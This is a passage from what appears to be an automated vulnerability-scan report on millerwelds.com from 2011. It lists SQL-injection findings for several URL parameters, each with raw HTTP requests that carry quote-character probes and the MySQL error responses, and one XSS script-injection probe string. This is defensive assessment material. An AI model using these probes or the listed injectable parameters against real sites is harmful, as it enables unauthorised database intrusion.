Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.4.10.1303147760

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:52 GMT
Connection: Keep-Alive
Content-Length: 14835

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
   <meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /about/certifications.html?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.4.10.1303147760

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:53 GMT
Connection: Keep-Alive
Content-Length: 16538

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
   <meta http-equiv="content-type" content="text/html; ch
...[SNIP]...

1.83. http://www.millerwelds.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /favicon.ico' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.1.10.1303147760; __qca=P0-154865017-1303147760079

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:37 GMT
Connection: Keep-Alive
Content-Length: 27688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/favicon.ico''' at line 1)<br>
...[SNIP]...

1.84. http://www.millerwelds.com/financing/ [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; __utmb=94003201.10.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:34:11 GMT
Connection: Keep-Alive
Content-Length: 13952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/financing/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/scr' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; __utmb=94003201.10.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:34:13 GMT
Connection: Keep-Alive
Content-Length: 15521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...

1.85. http://www.millerwelds.com/financing/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /financing'/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:35:18 GMT
Connection: Keep-Alive
Content-Length: 27887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?int_source=/products/accessories/international/&int_medium=bannerad&int_content' at line 1)<br>
...[SNIP]...

1.86. http://www.millerwelds.com/financing/ [int_campaign parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The int_campaign parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the int_campaign parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:08 GMT
Connection: Keep-Alive
Content-Length: 13992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/financing/?int_source=/products/accessories/international/&int_medium=bannerad' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:09 GMT
Connection: Keep-Alive
Content-Length: 15807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...

1.87. http://www.millerwelds.com/financing/ [int_content parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The int_content parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the int_content parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace'&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:52 GMT
Connection: Keep-Alive
Content-Length: 13913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace''&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:53 GMT
Connection: Keep-Alive
Content-Length: 15807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...

1.88. http://www.millerwelds.com/financing/ [int_medium parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The int_medium parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the int_medium parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad'&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:33 GMT
Connection: Keep-Alive
Content-Length: 13913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad''&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:35 GMT
Connection: Keep-Alive
Content-Length: 15807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...

1.89. http://www.millerwelds.com/financing/ [int_source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The int_source parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the int_source parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/?int_source=/products/accessories/international/'&int_medium=bannerad&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:17 GMT
Connection: Keep-Alive
Content-Length: 13913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/?int_source=/products/accessories/international/''&int_medium=bannerad&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:18 GMT
Connection: Keep-Alive
Content-Length: 15807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...

1.90. http://www.millerwelds.com/financing/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline&1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:34:40 GMT
Connection: Keep-Alive
Content-Length: 13917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
